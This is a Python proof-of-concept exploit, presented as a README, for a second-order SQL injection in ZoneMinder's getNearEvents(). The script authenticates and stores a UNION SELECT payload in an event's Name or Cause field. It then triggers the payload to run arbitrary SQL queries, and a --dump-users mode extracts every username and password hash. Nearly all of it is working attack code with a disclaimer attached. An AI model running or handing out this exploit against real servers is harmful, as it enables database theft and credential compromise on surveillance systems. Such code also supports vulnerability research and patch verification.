README.md
Rendering markdown...
#!/usr/bin/env python3
"""
CVE-2026-27470 - ZoneMinder Second-Order SQL Injection PoC
=============================================================
Affected versions : <= 1.36.37 and 1.37.61 - 1.38.0
Fixed in : 1.36.38 / 1.38.1
Vulnerable file : web/ajax/status.php -> getNearEvents()
LEGAL DISCLAIMER:
This tool is for educational and authorized security research purposes only.
Do not use against systems you do not own or have explicit written permission to test.
Usage:
python3 poc.py -t http://10.10.10.10 -u admin -p password
python3 poc.py -t http://10.10.10.10 -u admin -p password --query "SELECT user()"
python3 poc.py -t http://10.10.10.10 -u admin -p password --dump-users
"""
import argparse
import re
import sys
import requests
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
BANNER = """
╔══════════════════════════════════════════════════════════╗
║ CVE-2026-27470 — ZoneMinder Second-Order SQLi PoC ║
║ CVSS 8.8 | Authenticated | Events Permission ║
╚══════════════════════════════════════════════════════════╝
"""
def get_csrf_token(session, target):
"""Extract __csrf_magic token from the page."""
resp = session.get(f"{target}/", verify=False, allow_redirects=True)
m = re.search(r'csrfMagicToken\s*=\s*["\']([^"\']+)["\']', resp.text)
if m:
return m.group(1)
m2 = re.search(r'name=["\']__csrf_magic["\'][^>]*value=["\']([^"\']+)["\']', resp.text)
if m2:
return m2.group(1)
return None
def login(session, target, username, password):
"""
Authenticate to ZoneMinder and retrieve session cookie + CSRF token.
If ZM_OPT_USE_AUTH=0, authentication is skipped and only the session is initialized.
"""
# Load the root page to initialize the session and grab the CSRF token
resp = session.get(f"{target}/", verify=False, allow_redirects=True)
# Extract CSRF token
csrf = None
m = re.search(r'csrfMagicToken\s*=\s*["\']([^"\']+)["\']', resp.text)
if m:
csrf = m.group(1)
if not csrf:
m2 = re.search(r'name=["\']__csrf_magic["\'][^>]*value=["\']([^"\']+)["\']', resp.text)
if m2:
csrf = m2.group(1)
session._zm_csrf = csrf # Store for later use
# If auth is disabled, ZoneMinder redirects to the privacy page — session is ready
if "privacy" in resp.url:
print("[*] ZM_OPT_USE_AUTH=0 detected — auth disabled, session ready.")
return True
# Auth is enabled — send login POST
data = {
"view": "login",
"action": "login",
"username": username,
"password": password,
}
if csrf:
data["__csrf_magic"] = csrf
resp2 = session.post(f"{target}/index.php", data=data, verify=False, allow_redirects=True)
# Refresh CSRF token after login
m3 = re.search(r'csrfMagicToken\s*=\s*["\']([^"\']+)["\']', resp2.text)
if m3:
session._zm_csrf = m3.group(1)
if "logout" in resp2.text.lower() or "console" in resp2.url:
return True
if resp2.status_code in (200, 302):
resp3 = session.get(f"{target}/index.php?view=console", verify=False, allow_redirects=True)
if resp3.status_code == 200 and "login" not in resp3.url:
return True
return False
def get_event_id(session, target):
"""Retrieve any available event ID via the ZoneMinder status API."""
url = f"{target}/index.php"
params = {
"request": "status",
"entity": "events",
"sort_field": "Id",
"sort_asc": "1",
"limit": "1",
}
resp = session.get(url, params=params, verify=False)
try:
data = resp.json()
events = data.get("results", [])
if events:
return events[0].get("Id") or events[0].get("id")
except Exception:
pass
return None
def inject_payload(session, target, event_id, payload, field="Name"):
"""
Phase 1: Write the malicious payload into the event Name or Cause field.
ZoneMinder uses a parameterized query here — the payload is stored safely.
"""
url = f"{target}/index.php"
csrf = getattr(session, '_zm_csrf', None)
if field == "Name":
data = {
"request": "event",
"action": "rename",
"id": event_id,
"eventName": payload,
}
else: # Cause
data = {
"request": "event",
"action": "edit",
"id": event_id,
"newEvent[Cause]": payload,
"newEvent[Notes]": "poc",
}
if csrf:
data["__csrf_magic"] = csrf
resp = session.post(url, data=data, verify=False)
return resp.status_code == 200
def trigger_sqli(session, target, event_id, field="Name"):
"""
Phase 2: Trigger second-order injection via getNearEvents().
The stored payload is read from the DB and concatenated unsafely into SQL.
"""
url = f"{target}/index.php"
params = {
"request": "status",
"entity": "nearevents",
"id": event_id,
"sort_field": field,
"sort_asc": "1",
}
resp = session.get(url, params=params, verify=False)
return resp
def restore_event_name(session, target, event_id, original_name="Event"):
"""Restore the event name to its original value after exploitation."""
url = f"{target}/index.php"
csrf = getattr(session, '_zm_csrf', None)
data = {
"request": "event",
"action": "rename",
"id": event_id,
"eventName": original_name,
}
if csrf:
data["__csrf_magic"] = csrf
session.post(url, data=data, verify=False)
def run_exploit(target, username, password, sql_query, field="Name", restore=True, manual_event_id=None):
session = requests.Session()
session.headers.update({
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64)"
})
print(f"\n[*] Target : {target}")
print(f"[*] User : {username}")
print(f"[*] Query : {sql_query}\n")
# Step 1 — Authenticate
print("[*] Logging in...")
if not login(session, target, username, password):
print("[-] Login failed. Check credentials.")
sys.exit(1)
print("[+] Session established.")
# Step 2 — Get event ID
if manual_event_id:
event_id = manual_event_id
print(f"[+] Event ID (manual): {event_id}")
else:
print("[*] Looking for an event ID...")
event_id = get_event_id(session, target)
if not event_id:
print("[-] No events found. Specify one manually with --event-id.")
sys.exit(1)
print(f"[+] Event ID: {event_id}")
# Step 3 — Build UNION-based payload
# Events.Name is varchar(64) — keep payloads under 63 characters
# UNION SELECT requires 2 columns to match (Id, StartDateTime)
union_payload = f"' UNION SELECT ({sql_query}),NULL-- -"
print(f"[*] Injecting payload into '{field}' field...")
if not inject_payload(session, target, event_id, union_payload, field=field):
print("[-] Failed to write payload. Check permissions.")
sys.exit(1)
print("[+] Payload stored via parameterized query — looks clean in the DB.")
# Step 4 — Trigger second-order injection
print("[*] Triggering second-order injection...")
resp = trigger_sqli(session, target, event_id, field=field)
print(f"[*] HTTP {resp.status_code}")
result = None
try:
data = resp.json()
# Real ZoneMinder response: {"nearevents": {"NextEventId": "<RESULT>"}}
nearevents = data.get("nearevents", {})
if nearevents:
result = (nearevents.get("NextEventId")
or nearevents.get("PrevEventId")
or nearevents.get("NextEventStartTime"))
# Fallback: {"results": [...]}
if not result:
results = data.get("results", data.get("data", []))
if results:
result = results[0].get("Id") or results[0].get("StartDateTime")
if not result:
result = str(data)
except Exception:
result = resp.text[:500]
# Step 5 — Cleanup
if restore:
restore_event_name(session, target, event_id)
print("[*] Event name restored.")
return result
def main():
print(BANNER)
parser = argparse.ArgumentParser(
description="CVE-2026-27470 — ZoneMinder Second-Order SQL Injection PoC"
)
parser.add_argument("-t", "--target", required=True, help="Target URL (e.g. http://10.10.10.10)")
parser.add_argument("-u", "--username", required=True, help="ZoneMinder username")
parser.add_argument("-p", "--password", required=True, help="ZoneMinder password")
parser.add_argument("--event-id", type=int, help="Event ID to use as injection carrier")
parser.add_argument("--field", default="Name", choices=["Name", "Cause"],
help="Injection field (default: Name)")
parser.add_argument("--query", default="SELECT VERSION()",
help="SQL query to execute")
parser.add_argument("--dump-users", action="store_true",
help="Dump all usernames and password hashes")
parser.add_argument("--no-restore", action="store_true",
help="Do not restore the event name after exploitation")
args = parser.parse_args()
target = args.target.rstrip("/")
eid = args.event_id
if args.dump_users:
print("[*] Mode: User dump")
count_result = run_exploit(
target, args.username, args.password,
"SELECT COUNT(*) FROM Users",
field=args.field,
restore=not args.no_restore,
manual_event_id=eid
)
print(f"\n[+] User count: {count_result}\n")
# Events.Name is varchar(64) — fetch username and hash separately to stay within limit
for i in range(10):
uname = run_exploit(
target, args.username, args.password,
f"SELECT Username FROM Users LIMIT {i},1",
field=args.field, restore=not args.no_restore, manual_event_id=eid
)
# Empty result means no more users
uname_str = str(uname) if uname else ""
if not uname_str or uname_str in ("None", "1", "") or "{" in uname_str:
break
passwd = run_exploit(
target, args.username, args.password,
f"SELECT Password FROM Users LIMIT {i},1",
field=args.field, restore=not args.no_restore, manual_event_id=eid
)
print(f"[+] User {i+1}: {uname}:{passwd}")
else:
result = run_exploit(
target, args.username, args.password,
args.query,
field=args.field,
restore=not args.no_restore,
manual_event_id=eid
)
print(f"\n[+] Result: {result}\n")
if __name__ == "__main__":
main()